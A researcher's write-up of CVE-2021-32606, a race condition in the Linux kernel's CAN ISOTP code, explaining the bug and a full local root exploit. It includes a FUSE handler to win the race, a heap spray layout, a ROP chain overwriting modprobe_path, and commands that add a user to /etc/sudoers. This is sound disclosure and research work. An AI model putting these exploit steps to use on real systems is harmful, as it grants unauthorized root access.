This article is about a recent vulnerability in the Linux kernel labeled CVE-2021-32606. The vulnerable code is the ISOTP protocol in the CAN networking subsystem. In the following, I am going to cover the vulnerability and my exploitation approach, which led to successful local privilege escalation to root.
The vulnerability is a race condition which allowed socket options to be modified after the socket was bound. The race occurs between isotp_setsockopt() and isotp_bind().
In the CAN ISOTP protocol, any non-default socket options have to be set with isotp_setsockopt() before binding the socket. Especially since the introduction of CAN_ISOTP_SF_BROADCAST support in commit 921ca574cd38, no further change of socket options is allowed after binding, as this might result in socket behavior other than previously expected.
Every ISOTP socket has the following struct can_isotp_options, which can be changed with isotp_setsockopt():
struct can_isotp_options {
    __u32 flags; /* set flags for isotp behaviour. */
    ...
When an ISOTP socket is about to be bound in isotp_bind(), the flags are checked against CAN_ISOTP_SF_BROADCAST. If CAN_ISOTP_SF_BROADCAST is set, no CAN receiver will be registered. A CAN receiver is a callback which is automatically run in a software interrupt in order to receive incoming CAN messages.
static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
{
    ...
    /* do not register frame reception for functional addressing */
    if (so->opt.flags & CAN_ISOTP_SF_BROADCAST)
        do_rx_reg = 0;
    ...
    if (do_rx_reg)
        can_rx_register(net, dev, addr->can_addr.tp.rx_id,
                        SINGLE_MASK(addr->can_addr.tp.rx_id),
                        isotp_rcv, sk, "isotp", sk);
    ...
    so->bound = 1;
    ...
Above in isotp_bind(), we can see that can_rx_register() won't be called if CAN_ISOTP_SF_BROADCAST is set. In isotp_setsockopt(), we can either set or remove this flag.
The following excerpt shows isotp_setsockopt() from net/can/isotp.c:
static int isotp_setsockopt(struct socket *sock, int level, int optname,
                            sockptr_t optval, unsigned int optlen)
{
    struct sock *sk = sock->sk;
    struct isotp_sock *so = isotp_sk(sk);
    int ret = 0;

    if (level != SOL_CAN_ISOTP)
        return -EINVAL;

    if (so->bound) /* [1] */
        return -EISCONN;

    switch (optname) {
    case CAN_ISOTP_OPTS:
        if (optlen != sizeof(struct can_isotp_options))
            return -EINVAL;

        if (copy_from_sockptr(&so->opt, optval, optlen)) /* [2] */
            return -EFAULT;
        break;
    ...
If the socket is already bound [1], we return from the function early, as the socket options of a bound socket must not be modified.
If the socket is not bound, struct can_isotp_options will be copied [2] from user space.
Now consider the following race condition between isotp_setsockopt() and isotp_bind():
- isotp_setsockopt() is called and we pass the check at [1] since the socket is unbound.
- isotp_bind() is by default called without CAN_ISOTP_SF_BROADCAST, resulting in the registration of a CAN receiver. In the end, so->bound will be set to 1.
- The socket was just bound but we are still in isotp_setsockopt(). If the timing is right, we will change struct can_isotp_options with flags set to CAN_ISOTP_SF_BROADCAST. Notice that the copy [2] will happen on an already bound socket.
At this point, we have a socket with a registered CAN receiver, even though its newly set flags (CAN_ISOTP_SF_BROADCAST) say that no receiver should ever have been registered.
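The interleaving described above can be replayed deterministically in a small user-space model. This is only a sketch: struct model_sock and all function names are hypothetical stand-ins, not kernel code, and the flag value 0x800 for CAN_ISOTP_SF_BROADCAST is an assumption taken from the uapi header as I understand it.

```c
#include <stdbool.h>
#include <stdint.h>

#define SF_BROADCAST 0x800u /* assumed value of CAN_ISOTP_SF_BROADCAST */

/* Hypothetical, heavily reduced stand-in for struct isotp_sock */
struct model_sock {
    bool bound;
    bool rx_registered;
    uint32_t flags;
};

/* First half of setsockopt: the bound check at [1] */
static bool setsockopt_check(const struct model_sock *so)
{
    return !so->bound;
}

/* Second half of setsockopt: the copy at [2], which may run much later */
static void setsockopt_copy(struct model_sock *so, uint32_t new_flags)
{
    so->flags = new_flags;
}

/* bind: registers a receiver unless the broadcast flag is set */
static void model_bind(struct model_sock *so)
{
    if (!(so->flags & SF_BROADCAST))
        so->rx_registered = true;
    so->bound = true;
}

/* Replays the racy ordering: check, then bind, then the delayed copy */
static struct model_sock replay_race(void)
{
    struct model_sock so = { false, false, 0 };

    if (setsockopt_check(&so)) {            /* passes: socket is unbound */
        model_bind(&so);                    /* runs while the copy is stalled */
        setsockopt_copy(&so, SF_BROADCAST); /* lands on a bound socket */
    }
    return so;
}
```

The resulting state (bound, receiver registered, broadcast flag set) is one that neither function could produce on its own, which is exactly the inconsistency the exploit relies on.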
After winning the race, we close the socket and isotp_release() is called.
static int isotp_release(struct socket *sock)
{
    ...
    /* remove current filters & unregister */
    if (so->bound && (!(so->opt.flags & CAN_ISOTP_SF_BROADCAST))) { /* [1] */
        if (so->ifindex) {
            struct net_device *dev;

            dev = dev_get_by_index(net, so->ifindex);
            if (dev) {
                can_rx_unregister(net, dev, so->rxid, /* [2] */
                                  SINGLE_MASK(so->rxid),
                                  isotp_rcv, sk);
                dev_put(dev);
            }
        }
    }
    ...
The check at [1] ensures that the CAN receiver is unregistered [2] only if flags doesn't contain CAN_ISOTP_SF_BROADCAST.
But because we illegally changed flags after binding the socket, the kernel now assumes that we never registered a CAN receiver, so none will be unregistered.
At this point, we have closed the ISOTP socket, but its CAN receiver is still registered.
If another socket sends a message to our freed socket, a softirq will call isotp_rcv() on the freed struct isotp_sock, resulting in a use-after-free.
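The release-side condition can be written down as a tiny predicate to make the leak explicit. Again, this is a hedged user-space sketch: the function names are made up for illustration and 0x800 is my assumed value for CAN_ISOTP_SF_BROADCAST.

```c
#include <stdbool.h>
#include <stdint.h>

#define SF_BROADCAST 0x800u /* assumed value of CAN_ISOTP_SF_BROADCAST */

/* Mirrors the condition at [1] in isotp_release() */
static bool release_unregisters(bool bound, uint32_t flags)
{
    return bound && !(flags & SF_BROADCAST);
}

/* A receiver dangles if it was registered but release skips the unregister */
static bool receiver_dangles(bool rx_registered, bool bound, uint32_t flags)
{
    return rx_registered && !release_unregisters(bound, flags);
}
```

For a normally bound socket the predicate reports no dangling receiver; only the state produced by the race (registered, bound, broadcast flag set) leaves the callback behind.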
In order to allow successful exploitation, the following conditions are required:
- The kernel needs to come with the config option CONFIG_USER_NS enabled. This option is needed to set up a sandbox for the unprivileged user, which makes it possible to autoload the VCAN and ISOTP modules. The former is needed to set up a CAN networking device for our ISOTP sockets, and the latter is needed to create those sockets.
- An infoleak is needed in order to bypass KASLR and to get the GS base address. The usage of the latter will be explained soon. In my case, I could trigger a kernel warning which writes an Oops-style message to the kernel logs. Kernel logs can be read on distributions which haven't restricted access to dmesg via CONFIG_SECURITY_DMESG_RESTRICT.
Exploitation is possible on machines with SMEP, SMAP, KASLR and KPTI enabled.
For this particular exploit, I originally wanted to use the userfault technique to reliably control the race condition. Because unprivileged use of userfault has recently been restricted, I looked for other possibilities and came across a FUSE-based technique which Jann Horn used in the past to control a race condition. I think that because userfault worked so well, this technique has not been used as frequently, but it is still a worthwhile way to make this particular exploit reliable.
One drawback of the FUSE technique is that FUSE might not come preinstalled on some distributions. On OpenSUSE Tumbleweed with the XFCE desktop, FUSE came preinstalled and was accessible to unprivileged users. Repeated tests have shown that there is still a good chance of exploiting this vulnerability without FUSE or userfault, but the reliability would likely decrease.
In short, FUSE stands for Filesystem in Userspace and allows mounting self-made filesystems in a user-controlled directory. For this exploit, I used a template filesystem from libfuse called "hello", which I modified for use in this exploit.
The following excerpt shows the hello_read() function from the hello filesystem:
static int hello_read(const char *path, char *buf, size_t size, off_t offset,
                      struct fuse_file_info *fi)
{
    /* wait inside isotp_setsockopt() */
    sleep(2);

    int flags = CAN_ISOTP_SF_BROADCAST;
    struct can_isotp_options opts;
    size_t len = sizeof(opts);

    memset(&opts, 0, sizeof(opts));
    opts.flags = flags;

    if (offset < len) {
        if (offset + size > len)
            size = len - offset;
        /* cast to a byte pointer so that offset counts bytes, not structs */
        memcpy(buf, (char *)&opts + offset, size);
    } else {
        size = 0;
    }
    return size;
}
In this case, any read associated with the hello filesystem will be redirected to hello_read().
Inside hello_read(), we sleep() for 2 seconds, effectively halting kernel execution at copy_from_sockptr() in isotp_setsockopt().
    if (copy_from_sockptr(&so->opt, optval, optlen))
        return -EFAULT;
In the meantime, isotp_bind() will finish and bind the socket, finally setting so->bound to 1.
Then, we proceed with copying flags containing CAN_ISOTP_SF_BROADCAST to kernel space.
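The offset and size handling inside a read callback like hello_read() can be isolated into a small helper, which makes the byte arithmetic easier to check. The helper name read_clamped() and its parameter order are my own; this is a minimal sketch and not part of libfuse.

```c
#include <stddef.h>
#include <string.h>

/*
 * Copy at most `size` bytes of the `len`-byte object at `src`, starting at
 * byte `offset`, into `buf`. Returns the number of bytes actually copied.
 */
static size_t read_clamped(char *buf, size_t size, size_t offset,
                           const void *src, size_t len)
{
    if (offset >= len)
        return 0;                 /* read starts past the end */
    if (size > len - offset)
        size = len - offset;      /* clamp to the remaining bytes */
    /* byte pointer, so that offset is counted in bytes */
    memcpy(buf, (const char *)src + offset, size);
    return size;
}
```

Casting the source to a byte pointer before adding the offset matters: adding an offset to a pointer to a struct would step in units of the whole struct rather than in bytes.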
void setup_fusefs(void)
{
    fuse_fd = open("mnt/hello", O_RDWR); /* [1] */
    if (fuse_fd < 0)
        die("failed to open fuse fd");

    fuse_map = mmap(NULL, sizeof(struct can_isotp_options),
                    PROT_READ | PROT_WRITE, MAP_SHARED, fuse_fd, 0); /* [2] */
    if (fuse_map == MAP_FAILED)
        die("failed to map with fuse fs");
}
In my exploit, I open a file on the filesystem to get an fd [1] and mmap memory [2], similarly to userfault.
This mmap() is backed by the previously opened fuse_fd. As already mentioned, any copy the kernel performs from this mmap'ed memory will be handled by hello_read().
At this point, we have a properly set up FUSE filesystem which will help us to reliably win the race condition between isotp_setsockopt() and isotp_bind().
What does the controlled race condition scenario look like?
- isotp_setsockopt() is called on an unbound socket.
  - copy_from_sockptr() wants to copy struct can_isotp_options from user space
  - hello_read() is called and goes to sleep() for 2 seconds, kernel execution is now halted!
- while we are in setsockopt(), we now call isotp_bind()
  - CAN_ISOTP_SF_BROADCAST flag is not set, so a CAN receiver will be registered
  - return from isotp_bind(), the socket is now successfully bound
- during the 2 seconds isotp_setsockopt() was halted, we expect isotp_bind() to be completed
  - memcpy() inside hello_read() will now copy the struct to kernel space
  - we set the CAN_ISOTP_SF_BROADCAST flag for a bound socket!
As already mentioned, closing the socket won't unregister the CAN receiver, and we cause a few use-after-frees inside isotp_rcv() whenever we send a message to the freed socket.
My approach focuses on spraying the freed struct isotp_sock so we can reliably pass the checks in isotp_rcv() and call an overwritten function pointer. Because the struct is pretty big (on my machine it was 17432 bytes) and exceeds the biggest kmalloc cache, kmalloc-8k, it won't be allocated in any of the generic SLAB caches.
Instead, the page allocator will allocate it.
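To get a feeling for what the page allocator hands out for an object of this size, the following sketch computes the allocation order. It assumes 4 KiB pages and that oversized requests are rounded up to a power-of-two number of pages; page_order() is a hypothetical helper written for this illustration, not a kernel function.

```c
#include <stddef.h>

/* Smallest order such that (1 << order) pages can hold `size` bytes */
static unsigned int page_order(size_t size, size_t page_size)
{
    size_t pages = (size + page_size - 1) / page_size; /* round up */
    unsigned int order = 0;

    while (((size_t)1 << order) < pages)
        order++;
    return order;
}
```

Under these assumptions, 17432 bytes need 5 pages, which rounds up to an order-3 block of 8 pages (32 KiB). A spray therefore has to request a size that ends up in the same order to have a chance of reclaiming the freed socket.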
Looking for a feasible spray primitive, I ended up choosing setxattr(). This syscall has mainly been used in combination with userfault, as setxattr() frees the buffer right after copying it. In fact, we could probably hold it with FUSE, but after repeated tests I noticed that setxattr() alone is also very reliable in this case. The most important property for this approach is that setxattr() does not clear the buffer when freeing it, so the previously copied bytes remain in memory.
Theoretically, some other object could be allocated right after we sprayed the freed socket, but in practice this does not provoke any crashes, and in the worst case we can simply rerun the exploit and try again. In the following, I will explain this further.
static void isotp_rcv(struct sk_buff *skb, void *data)
{
    /* Strictly receive only frames with the configured MTU size
     * => clear separation of CAN2.0 / CAN FD transport channels
     */
    if (skb->len != so->ll.mtu) /* [1] */
        return;
    ...
    switch (n_pci_type) {
    ...
    case N_PCI_SF:
        /* rx path: single frame
         *
         * As we do not have a rx.ll_dl configuration, we can only test
         * if the CAN frames payload length matches the LL_DL == 8
         * requirements - no matter if it's CAN 2.0 or CAN FD
         */

        /* get the SF_DL from the N_PCI byte */
        sf_dl = cf->data[ae] & 0x0F;

        if (cf->len <= CAN_MAX_DLEN) {
            isotp_rcv_sf(sk, cf, SF_PCI_SZ4 + ae, skb, sf_dl); /* [2] */
    ...
At the beginning of isotp_rcv(), the length of the received sk_buff is checked against so->ll.mtu.
The skb->len of the received message is 16 by default, so so->ll.mtu also has to be 16. If this is not the case, we return from the function.
Because we control the whole struct isotp_sock with the setxattr() spray, we can set so->ll.mtu to 16. This is also why this seemingly unreliable spraying approach is still very reliable: if the spray fails, it's very unlikely that isotp_rcv() will read exactly 16 at the position of so->ll.mtu. For any garbage value other than 16, we safely return from isotp_rcv() and can try again.
After the initial check [1], isotp_rcv_sf() will be called [2] to receive a so-called CAN single frame message, provided the message length is <= 8.
static int isotp_rcv_sf(struct sock *sk, struct canfd_frame *cf, int pcilen,
                        struct sk_buff *skb, int len)
{
    ...
    hrtimer_cancel(&so->rxtimer); /* [1] */
    so->rx.state = ISOTP_IDLE;
    ...
    if ((so->opt.flags & ISOTP_CHECK_PADDING) && /* [2] */
        check_pad(so, cf, pcilen + len, so->opt.rxpad_content)) {
        /* malformed PDU - report 'not a data message' */
        sk->sk_err = EBADMSG;
        if (!sock_flag(sk, SOCK_DEAD))
            sk->sk_error_report(sk); /* [3] */
        return 1;
    }
At [1], one of the hrtimers is cancelled by calling hrtimer_cancel(). I won't cover hrtimers in detail in this article. All you have to know is that we need to overwrite the freed socket's memory at so->rxtimer.base in order to prevent kernel crashes. struct hrtimer has a pointer to struct hrtimer_clock_base, and hrtimer_clock_base is defined per CPU core.
Fortunately, the GS register mentioned above holds the address of one core's per-CPU data, and adding a constant offset to this address gives us a valid struct hrtimer_clock_base.
After a couple of checks in hrtimer_cancel(), the socket's flags are checked [2] against ISOTP_CHECK_PADDING. These are the very flags in which CAN_ISOTP_SF_BROADCAST is stored. We can provide this flag along with some other flags needed in check_pad().
The combination of the user-controlled message length and the padding flags results in the message being treated as malformed. Accordingly, the socket will call sk_error_report() [3] to report this issue.
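The exploit output further below prints "flags = 838". Read as a hexadecimal value (my assumption about the format string), it decodes into the broadcast flag plus three padding-related flags. The sketch below uses flag values as I understand them from include/uapi/linux/can/isotp.h and the ISOTP_CHECK_PADDING mask from net/can/isotp.c; treat both as assumptions and verify them against your kernel sources. The two helper functions are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed values, mirroring include/uapi/linux/can/isotp.h */
#define CAN_ISOTP_RX_PADDING   0x008u
#define CAN_ISOTP_CHK_PAD_LEN  0x010u
#define CAN_ISOTP_CHK_PAD_DATA 0x020u
#define CAN_ISOTP_SF_BROADCAST 0x800u

/* Assumed definition of the mask checked at [2] in isotp_rcv_sf() */
#define ISOTP_CHECK_PADDING (CAN_ISOTP_CHK_PAD_LEN | CAN_ISOTP_CHK_PAD_DATA)

/* True if isotp_rcv_sf() would go on to call check_pad() */
static bool takes_padding_path(uint32_t flags)
{
    return (flags & ISOTP_CHECK_PADDING) != 0;
}

/* True if isotp_release() would skip can_rx_unregister() */
static bool skips_unregister(uint32_t flags)
{
    return (flags & CAN_ISOTP_SF_BROADCAST) != 0;
}
```

With these values, 0x838 satisfies both predicates at once: it keeps the receiver registered on close and steers the receive path towards the sk_error_report() call.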
Since we control every single byte of struct isotp_sock, it's also possible to overwrite the sk_error_report() pointer. At this point, we have successfully achieved arbitrary kernel code execution.
One may ask where we are supposed to redirect execution. Jumping to invalid places led to a kernel panic, but then I noticed that the RDI register stored the address of our freed struct isotp_sock. I decided to perform a stack pivot to this address and start executing ROP gadgets. In order to make use of the ROP gadgets found in the vmlinux image, I use the KASLR offset leaked from the warning in the kernel logs.
When I assembled the ROP chain, I took into account that the space might not be sufficient and that some important data might eventually be overwritten. Because of that, I almost immediately moved the stack pointer to somewhere in the middle of the sprayed target, where no data would explicitly be used by isotp_rcv(). This is possible because of the large size of struct isotp_sock, which makes it feasible to place the payload inside the object.
In this example, I place my extended ROP chain at offset 0x718.
/* overwrite sk_error_report() (offset 0x2b8) with stack pivot */
dst = (uint64_t *)(p + 0x2b8);
*dst = ROP_PUSH_RDI__JUNK__POP_RSP__RET + kaslr_offset;

/* ROP at isotp_sock + 0x8 */
dst = (uint64_t *)(p + 0x8);
*dst = ROP_RET_0x700 + kaslr_offset;
dst++;
/* jump to extended rop chain at isotp_sock + 0x10 */
*dst = ROP_RET + kaslr_offset;

/* extended rop chain */
rop = (uint64_t *)(p + 0x718);
*rop++ = ROP_POP_RAX__RET + kaslr_offset;
*rop++ = 0x782f706d742f; /* /tmp/x */
*rop++ = ROP_POP_RCX__RET + kaslr_offset;
*rop++ = MODPROBE_PATH + kaslr_offset;
*rop++ = ROP_MOV_RAX_INTO_RCX__RET + kaslr_offset;
*rop++ = ROP_POP_RAX__RET + kaslr_offset;
*rop++ = DO_TASK_DEAD + kaslr_offset; /* [1] */
*rop++ = ROP_JMP_RAX + kaslr_offset;
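The offset 0x718 is not arbitrary: it follows from how the x86-64 "ret imm16" instruction adjusts the stack pointer. The sketch below walks through the arithmetic, assuming (as the comments in the excerpt suggest) that the pivot leaves the stack pointer at isotp_sock + 0x8. The helper names are hypothetical.

```c
#include <stdint.h>

/* Plain `ret`: pops the 8-byte return address */
static uint64_t rsp_after_ret(uint64_t rsp)
{
    return rsp + 8;
}

/* `ret imm16`: pops the return address, then skips imm16 more bytes */
static uint64_t rsp_after_ret_imm16(uint64_t rsp, uint16_t imm)
{
    return rsp + 8 + imm;
}

/* Offset (relative to isotp_sock) where the extended chain must start */
static uint64_t extended_chain_offset(void)
{
    uint64_t rsp = 0x8;                    /* assumed: rsp right after the pivot */

    rsp = rsp_after_ret(rsp);              /* fetches the ret-0x700 gadget -> 0x10 */
    rsp = rsp_after_ret_imm16(rsp, 0x700); /* fetches the ret gadget -> 0x718 */
    return rsp;                            /* the next ret pops from here */
}
```

In other words, the two short entries at +0x8 and +0x10 act as a trampoline that jumps over 0x700 bytes of the object which isotp_rcv() still needs to read.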
[Figure: layout of the sprayed payload that overwrites struct isotp_sock]
The ROP chain implements a technique to overwrite modprobe_path. When any user tries to execute a file with an invalid file signature, the program at modprobe_path will be executed with root privileges.
This technique was apparently used in some CTF challenges and it was thoroughly described by lkmidas in his blog. In case you want to learn about it in depth, check out his well-written article.
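The constant 0x782f706d742f written to modprobe_path in the chain above is simply the string "/tmp/x" packed into a 64-bit little-endian word, with the unused upper bytes acting as the NUL terminator. A minimal sketch of that packing follows; pack_path() is a hypothetical helper of mine and only handles strings of up to 7 characters.

```c
#include <stdint.h>
#include <string.h>

/*
 * Pack a short string (at most 7 characters) into a 64-bit value whose
 * little-endian byte representation is the NUL-terminated string.
 * Returns 0 if the string does not fit.
 */
static uint64_t pack_path(const char *s)
{
    size_t n = strlen(s);
    uint64_t v = 0;

    if (n > 7)
        return 0;
    for (size_t i = 0; i < n; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return v;
}
```

Because a single 8-byte store has to carry the whole path including its terminator, the replacement path is limited to 7 characters, which is why such a short name is used.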
Once we have overwritten modprobe_path, the kernel thread will be stopped in do_task_dead() [1].
This step is needed because we are already done with exploiting the kernel, and any further execution of our hijacked kernel thread might result in severe kernel crashes.
ret = system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy; " /* [1] */
             "chmod +x /tmp/dummy");
if (ret != 0)
    die("/tmp/dummy creation failed");

ret = system("echo '#!/bin/sh' > /tmp/x; "
             "echo 'echo \"noprivs ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers' " /* [2] */
             ">> /tmp/x; chmod +x /tmp/x");
if (ret != 0)
    die("/tmp/x creation failed");
In short, I create a file /tmp/dummy [1] with the invalid signature 0xff 0xff 0xff 0xff.
I also create a file /tmp/x [2], which is the path written to modprobe_path. This small shell script adds the unprivileged user to /etc/sudoers, which allows escalating the user's privileges to root.
At this point, I have covered all of the steps, which now have to be combined. The following sequence is used in my exploit:
- trigger warning to retrieve kernel addresses from kernel logs
- set up FUSE filesystem and allocate memory with mmap()
- set up user namespace to autoload VCAN and ISOTP modules
- set up CAN networking device with VCAN
- open ISOTP socket 1
  - this socket will be exploited with the race condition
- open ISOTP socket 2
  - this socket will only be used to send a CAN message to socket 1
- win race condition on socket 1
- close socket 1
- spray the page allocator with setxattr() containing our payload to overwrite socket 1
- send CAN message from socket 2 to socket 1
- isotp_rcv() is run as software interrupt for socket 1
- in isotp_rcv(), pass checks and call malicious sk_error_report() pointer to perform the stack pivot
- stack pivot leads to ROP chain execution at struct isotp_sock
- execute extended ROP chain, overwrite modprobe_path
- try executing /tmp/dummy, /tmp/x will be executed with root privileges
- the unprivileged user is now added to /etc/sudoers and we can now get a root shell
Exploit output
noprivs@suse:~/expl> uname -a
Linux suse 5.12.0-1-default #1 SMP Mon Apr 26 04:25:46 UTC 2021 (5d43652) x86_64 x86_64 x86_64 GNU/Linux
noprivs@suse:~/expl> ./lpe
[+] entering setsockopt
[+] entering bind
[+] left bind with ret = 0
[+] left setsockopt with flags = 838
[+] race condition hit, closing and spraying socket
[+] sending msg to run softirq with isotp_rcv()
[+] check sudo su for root rights
noprivs@suse:~/expl> sudo su
suse:/home/noprivs/expl # id
uid=0(root) gid=0(root) groups=0(root)
Researching and exploiting the vulnerability was a great opportunity to expand my knowledge about the Linux kernel. I hope you enjoyed the article. In case of further questions, feel free to reach out to me by e-mail.
Also, I'm currently looking for an internship in infosec in Germany/Europe. In case you are interested, please reach out to me via e-mail.
https://bugs.chromium.org/p/project-zero/issues/detail?id=808
https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/